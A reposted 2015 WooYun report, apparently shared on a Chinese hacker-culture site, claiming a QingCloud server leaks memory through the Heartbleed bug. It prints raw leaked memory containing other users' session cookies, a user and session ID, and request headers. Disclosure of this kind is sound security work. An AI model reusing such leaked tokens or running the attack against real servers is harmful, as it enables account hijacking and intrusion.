记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

青云某核心业务服务器存在心脏滴血漏洞

2015-08-07 03:25

code 区域
ping console.qingcloud.com

PING console.qingcloud.com (117.121.25.2): 56 data bytes

Request timeout for icmp_seq 0





code 区域
....#..... .....................................cation/xhtml+xml,application/xml;q=0.9,*/*;q=0.8..Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3..Accept-Encoding: gzip, deflate..Sec-WebSocket-Version: 13..Origin: https://console.qingcloud.com..Sec-WebSocket-Extensions: permessage-deflate..Sec-WebSocket-Key: LY6MIyx5lalYCGvQ4bsl3w==..Cookie: __utma=52871208.444737175.1434699539.1434704945.1434938617.4; __utmz=52871208.1434699539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sk=i1bEHQeBmEaNPitObdu5Fw6np787Bz3q; __utmb=52871208.4.10.1434938617; __utmc=52871208; lang=zh-cn..Connection: keep-alive, Upgrade..Pragma: no-cache..Cache-Control: no-cache..Upgrade: websocket....68+ul d.*.....w...a........u5.....+3.l...................o.ZL=[.=.......E}.s..................!.....U?!...............P.@.....0.......4.........c.......c.............................q.......P.z.......c......................_).......k.......m.......k.......$.T!.....G.............z.2...............Z.1.$`N.L/..5....*0.z>K[..n......(.^...2.Pt.wv_ZHd.,m.+|.U...W..r..%../4X..........flN..@T........g.ny....DJf3.k.h.#....C..M..Q.D..h...67....F..../k..C.e.<z..L$.A....@..nGo7....k..|.E......+...W>.....V.V`.|.BnL....]\\.)....oP.....8\".9.......l...b...>.Y..\\...`.R.J3t.....).\'.h2-16.h2-15.h2-14.h2.spdy/3.1.http/1.1..................................c...................................................................................................tma=52871208.757200336.1428469079.1434505118.1434576182.29; __utmz=52871208.1428469079.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmc=52871208; sk=Cb2RQTmao5PFTftAzM5AHVqsRR5jah9l; lang=zh-cn..Connection: keep-alive.....F.....;(..8.nyV..U.......i9Y<...0.dg.K.Nc-WebSocket-Key: 6POALKbQNwOIR8YSfp71vw==..Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits.....oC39C....?%V...ate; client_max_window_bits.....@(....n.~......ts....I.....%.%.-..K9mient_max_window_bits....LO>......f.S.f[/ozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36..Accept-Encoding: gzip, deflate, sdch..Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4,zh-TW;q=0.2,ja;q=0.2..Cookie: sk=0f81R3less0deT75Zt5I05cVusGdk2nr; lang=zh-cn; __utma=52871208.874676821.1428464510.1434512987.1434592412.65; __utmc=52871208; __utmz=52871208.1428464510.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)..Sec-WebSocket-Key: 8O2ThrDkY2x4riAyLX30dQ==..Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits....d.......*...%..+..N>........iax_window_bits.......w.q`;.g..I...^.../u..................ons: permessage-deflate; client_max_window_bits....HH-i.8....Z.I......





code 区域
IP:14.29.83.5:8000<br>存在openssl 信息泄露: <br>

.@....SC[...r....+..H...9........w.3....f.....\".!.9.8.........5.............................3.2.....E.D...../...A.................................I...........4.2...................................................#...........................#..... .....................................ost&field=chat_robot_lost&type=plus&company_id=1..Connection: close..Accept-Encoding: gzip....p.\".,..9..C....qTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36..Accept-Encoding: gzip, deflate, sdch..Accept-Language: zh-CN,zh;q=0.8..Cookie: __utmt=1; sk=P0N3hfb1tNhSLrlTcX7HqB67uB8laxJJ; lang=zh-cn; __utma=52871208.106743412.1428224467.1434942010.1434949369.8; __utmb=52871208.9.10.1434949369; __utmc=52871208; __utmz=52871208.1434893668.6.3.utmcsr=baidu|utmccn=(organic)|utmcmd=organic|utmctr=%E9%9D%92%E4%BA%91..Sec-WebSocket-Key: THo6W1/5Ut2eQr3l2a1yIw==..Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits.....tf7M.r.i.2.....42190.82; __utmz=52871208.1434819876.81.4.utmcsr=qingcloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/; sk=DJQOsGiNuojEvWzpxdmMBgtxeFCHZGfj; __utmc=52871208; lang=zh-cn..Connection: keep-alive......_.......1..G....V.................i/index.html..Sec-WebSocket-Key: HrZKlWaYEOzyI8/JvYcSIQ==..Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits.........EX......I,. client_max_window_bits.......TQR..........ocket.......L..S..P..,P.$..!{.....pgrade: websocket....y........P..................................................................................................................................................................................................................................................................................................................................x.....Z.`Y......7..............................................................................................................................=.;...a}`iX......T......>.._y.Db.jX......7.........................................................^S....eX..............................................................................................................................................................................................................................................................k..-.l.0`Y..... +........................................................................................................................................................................................................................................................................................................................................................................................................n~..\"g.hX......................................................................................................................................................................................^..*C....U......7......................................................................................................................................................................................................n...:.....X......7................................................................................................................................................................................}......iX......7......w......r.........S...............................T`b%....`Y......7.......2..P.. .hX......|W..................................=h..hX.....@.................................................................................................P....../........P....../......._.m.#....l...}...e.|j....ks.e..[..59a0ffc4?uid=usr-sGBxjbSK&sid=bL28d86Tlwrh1GvbRP6VFJGN77wGimDf&zid=gd1 HTTP/1.1..Host: push.qingcloud.com:8000..Connection: Upgrade..Pragma: no-cache..Cache-Control: no-cache..Upgrade: websocket..Origin: https://console.qingcloud.com..Sec-WebSocket-Version: 13..User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36..Accept-Encoding: gzip, deflate, sdch..Accept-Language: zh-CN,zh;q=0.8..Cookie: sk=bL28d86Tlwrh1GvbRP6VFJGN77wGimDf; lang=zh-cn; __utma=52871208.597257020.1414820288.1433297498.1434334074.61; __utmc=52871208; __utmz=52871208.1417055879.12.2.utmcsr=baidu|utmccn=(organic)|utmcmd=organic|utmctr=%E9%9D%92%E4%BA%91..Sec-WebSocket-Key: fxYj+vKgGHCjNC7L/ZpluQ==..Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits....bA\"].Dp.........08.1432801841.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)..Sec-WebSocket-Key: YgjMm3n3NSDkUGXkv+pTtw==..Sec-WebSocket-Extensions: permessage-deflate;

漏洞证明:

修复方案:


知识来源: www.wooyun.org/bugs/wooyun-2015-0122136

阅读:172396 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“青云某核心业务服务器存在心脏滴血漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄❤

ADS

标签云